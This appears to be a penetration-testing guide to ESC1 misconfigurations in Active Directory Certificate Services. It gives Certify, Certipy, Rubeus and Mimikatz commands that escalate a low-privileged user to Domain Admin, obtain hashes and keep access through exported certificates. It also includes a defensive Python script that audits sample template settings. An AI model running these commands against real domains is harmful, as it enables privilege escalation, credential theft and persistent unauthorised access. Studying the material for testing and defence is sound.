Certificate Services

Table of contents

  1. Vulnerability
  2. Prerequisites
  3. Exploit
  4. Persistence

Vulnerability

Active Directory Certificate Services ships with certificate templates provided by Microsoft. These templates are meant to be duplicated and then configured. Misconfigurations in these templates can be abused to escalate your privileges if they are not corrected when the template is configured.

Prerequisites

  • Low privileged domain user.

Exploit

First, list vulnerable certificate templates with Certify for Windows or Certipy for Linux.

# From a domain joined computer.
./Certify.exe find /vulnerable

# From Kali Linux.
certipy find -u $Username@$DomainName -p $Password -dc-ip $DomainControllerIP -vulnerable

To continue this exploit, the previous command should output `[!] Vulnerable Certificates Templates` with the following conditions:

  • Certificate Name Flag must be set to ENROLLEE_SUPPLIES_SUBJECT, which allows the requester to provide any Subject Alternative Name.
  • Extended Key Usage must contain Client Authentication.
  • Enrollment Rights must contain a group in which you have compromised a user.

With all these prerequisites met, you can request an authentication certificate for any other domain user, including a Domain Admin.
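As an added audit example (not code from the original page, Certify or Certipy), the following Python script evaluates template records against the three conditions listed above, the way a defender reviewing template settings would. The records mimic the LDAP attributes of pKICertificateTemplate objects (msPKI-Certificate-Name-Flag, msPKI-Enrollment-Flag, pKIExtendedKeyUsage, msPKI-RA-Signature) but are constructed sample data, not pulled from a real forest; the LOW_PRIV_PRINCIPALS set is an assumption about which groups a low-privileged user belongs to. It goes beyond the page's list by also checking two hardening settings, manager approval and required authorized signatures, either of which stops a template that otherwise meets the three conditions from being abusable.

```python
"""Audit certificate templates for the ESC1 conditions (added example, constructed data)."""
from dataclasses import dataclass

# msPKI-Certificate-Name-Flag bit: the requester supplies the subject / SAN.
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001
# msPKI-Enrollment-Flag bit: CA manager approval is required before issuance.
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002

# EKU OIDs that let a certificate be used for client authentication.
# An empty pKIExtendedKeyUsage list means "any purpose" and also qualifies.
CLIENT_AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "2.5.29.37.0",             # Any Purpose
}

# Assumption for the sample: groups every low-privileged domain account belongs to.
LOW_PRIV_PRINCIPALS = {"Domain Users", "Authenticated Users", "Domain Computers"}


@dataclass
class Template:
    name: str
    certificate_name_flag: int   # msPKI-Certificate-Name-Flag
    enrollment_flag: int         # msPKI-Enrollment-Flag
    ekus: list                   # pKIExtendedKeyUsage OIDs
    ra_signatures: int           # msPKI-RA-Signature (authorized signatures required)
    enroll_principals: set       # principals holding Enroll (or Full Control) rights


def esc1_findings(t: Template, low_priv=LOW_PRIV_PRINCIPALS) -> list:
    """Return which of the three page conditions the template satisfies."""
    findings = []
    if t.certificate_name_flag & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        findings.append("ENROLLEE_SUPPLIES_SUBJECT")
    if not t.ekus or CLIENT_AUTH_EKUS & set(t.ekus):
        findings.append("client-auth EKU")
    if low_priv & t.enroll_principals:
        findings.append("low-privileged enrollment rights")
    return findings


def is_esc1_vulnerable(t: Template, low_priv=LOW_PRIV_PRINCIPALS) -> bool:
    """All three conditions must hold and neither hardening control may be set."""
    if len(esc1_findings(t, low_priv)) < 3:
        return False
    if t.enrollment_flag & CT_FLAG_PEND_ALL_REQUESTS:
        return False  # manager approval blocks automatic issuance
    if t.ra_signatures > 0:
        return False  # an enrollment agent signature is required
    return True


def audit(templates) -> list:
    """Names of templates that should be fixed (clear the flag, restrict Enroll,
    or require manager approval)."""
    return [t.name for t in templates if is_esc1_vulnerable(t)]


# Constructed sample templates covering the safe and unsafe combinations.
SAMPLE_TEMPLATES = [
    Template("VulnUserTemplate", 0x1, 0x0, ["1.3.6.1.5.5.7.3.2"], 0, {"Domain Users"}),
    Template("User", 0x0, 0x0, ["1.3.6.1.5.5.7.3.2"], 0, {"Domain Users"}),
    Template("WebServerCopy", 0x1, 0x0, ["1.3.6.1.5.5.7.3.1"], 0, {"Domain Users"}),
    Template("ApprovedAdminAuth", 0x1, 0x2, ["1.3.6.1.5.5.7.3.2"], 0, {"Domain Users"}),
    Template("AdminOnlyAuth", 0x1, 0x0, [], 0, {"Domain Admins"}),
]

if __name__ == "__main__":
    for t in SAMPLE_TEMPLATES:
        print(f"{t.name}: vulnerable={is_esc1_vulnerable(t)} conditions={esc1_findings(t)}")
```

Only VulnUserTemplate is flagged: WebServerCopy lacks a client-authentication EKU, ApprovedAdminAuth requires manager approval, and AdminOnlyAuth is enrollable only by Domain Admins. Feeding real template attributes into `Template` records gives the same verdict that `Certify.exe find /vulnerable` reports, which makes the script useful for confirming that a remediation actually removed the condition.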

If your foothold in the target domain is on a non-joined computer (for example via pass-the-ticket), check this issue for the modification to the Certify source code needed to make it work.

# Request a certificate for the target user.
# Add /machine if you are logged on as SYSTEM.
./Certify.exe request /ca:$CAName /template:$TemplateName /altname:$TargetUser

# From Kali Linux (the tool is Certipy, not Certify).
certipy req -target-ip $CertificateAuthorityIP -ca $CAName -template $TemplateName -spn $TargetUser@$DomainName -u $Username -p $Password

# Convert the full certificate (private key + certificate = cert.pem) to PFX so Rubeus can use it.
# Set the export password you want when prompted.
# This step is not needed from Kali Linux since Certipy does the conversion automatically.
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
cat cert.pfx | base64 -w 0

# Then ask a TGT for the target user.
./Rubeus.exe asktgt /user:$TargetUser /certificate:$Base64EncodedCertificate /password:$Password /nowrap

# Even better with Certipy, you can retrieve the NTLM hash of the targeted user.
certipy auth -pfx cert.pfx -username $TargetUser -domain $DomainName -dc-ip $DomainControllerIP

Persistence

Once you are local administrator (or Domain Admin), you can export certificates to authenticate with later. User certificates are valid for 1 year by default, so enjoy it! To list certificates, use Seatbelt or open the Certificates snap-in under Current User\Personal\Certificates\.

# List certificates and make sure the certificate can be used for client authentication.
./Seatbelt.exe Certificates

# Export certificates with Mimikatz (the exported PFX password is `mimikatz` in this case).
crypto::certificates /export

# Encode exported certificate.
cat cert.pfx | base64 -w 0

# Ask TGT with Rubeus.
./Rubeus.exe asktgt /user:$TargetUser /certificate:$Base64EncodedCertificate /password:mimikatz /nowrap